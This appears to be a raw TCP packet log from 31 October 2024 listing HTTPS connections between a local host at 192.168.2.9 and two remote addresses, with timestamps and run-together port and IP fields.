                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.928695917 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.929073095 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.929150105 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.931598902 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.931674004 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.931900978 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.933696985 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.933756113 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.933857918 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.941591978 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.942801952 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.942986965 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.974109888 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.974139929 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.974155903 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.974210024 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.974240065 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.974260092 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.974287987 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.975666046 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.975682974 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.975744963 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.975765944 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.975807905 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.977518082 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.978013039 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.979407072 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091592073 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091640949 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091684103 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091712952 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091730118 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091758966 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091766119 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091795921 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.091840029 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.309627056 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.309659958 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.309679985 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.309688091 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.311014891 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.311044931 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.311063051 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.311069012 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.326991081 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.326991081 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.327032089 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.327054977 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.328879118 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.328897953 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.328906059 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.328911066 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.330771923 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.330771923 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.330791950 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.330816031 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.335048914 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.335084915 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.335206985 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.336587906 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.336604118 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.345964909 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.346012115 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.346167088 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.346921921 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.346945047 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.347038984 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.348371983 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.348404884 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.348472118 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.351197958 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.351216078 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.355468035 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.355482101 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.357588053 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.357603073 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.388493061 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.388545990 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.388633966 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.389543056 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.389574051 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.389718056 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.390917063 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.390930891 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.397671938 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.397695065 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.397806883 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.399033070 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.399046898 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.401901007 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.401901007 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.401915073 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.401918888 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.503113031 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.503145933 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.503276110 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.503509045 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:01.503520012 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.171264887 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.171351910 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.171915054 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.171924114 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.172297001 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.172336102 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.172343969 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.172710896 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.173154116 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.173348904 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.173369884 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.173423052 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.173453093 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.177696943 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.177815914 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.179025888 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.179044008 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.179054022 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.214019060 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.214596033 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.214603901 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.216511965 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.216577053 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.217003107 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.217142105 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.217452049 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.217459917 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.223330975 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.223893881 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.223917961 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.257426977 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.305471897 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.305893898 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.307094097 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.333847046 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.341998100 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.349529028 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.349538088 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.349539995 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.382895947 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.382913113 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.407690048 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.407756090 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.407766104 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.423934937 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.423959970 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.423994064 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.423995972 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424015045 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424026966 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424030066 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424040079 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424042940 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424057961 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424088001 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424101114 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.424140930 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.447773933 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.451289892 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.451364994 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.451411009 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.486429930 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.486445904 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.487406969 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.487411976 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.489454031 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.489459038 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.491467953 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.491472006 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.492306948 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.492321014 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.493206978 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.493211985 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.493341923 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.493349075 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.494338989 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.494343042 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.495497942 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.495520115 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.496225119 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.496232033 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.504306078 CET49824443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.504337072 CET44349824206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508090019 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508100033 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508135080 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508147001 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508152008 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508178949 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508192062 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508204937 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508234978 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.508260965 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.510003090 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.510020018 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.510078907 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.510085106 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.510128975 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.576194048 CET49816443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.576224089 CET44349816206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.616347075 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.616408110 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.616481066 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.620651007 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.620726109 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.622236967 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.622311115 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.622319937 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.622541904 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.622553110 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.622662067 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.622661114 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.624104023 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.624196053 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.624252081 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.625125885 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.625174046 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.625217915 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.625231981 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.625258923 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.625267982 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.626372099 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.626420021 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.626533031 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766021967 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766043901 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766055107 CET49823443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766061068 CET4434982313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766091108 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766108036 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766141891 CET49822443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.766149044 CET4434982213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.770615101 CET49818443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.770634890 CET4434981813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.772849083 CET49819443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.772865057 CET4434981913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.774661064 CET49820443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.774676085 CET4434982013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.786896944 CET49829443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.786916018 CET44349829206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.805645943 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.805685997 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.805758953 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.814254999 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.814274073 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.825867891 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.825906992 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.826141119 CET49837443192.168.2.913.107.246.45
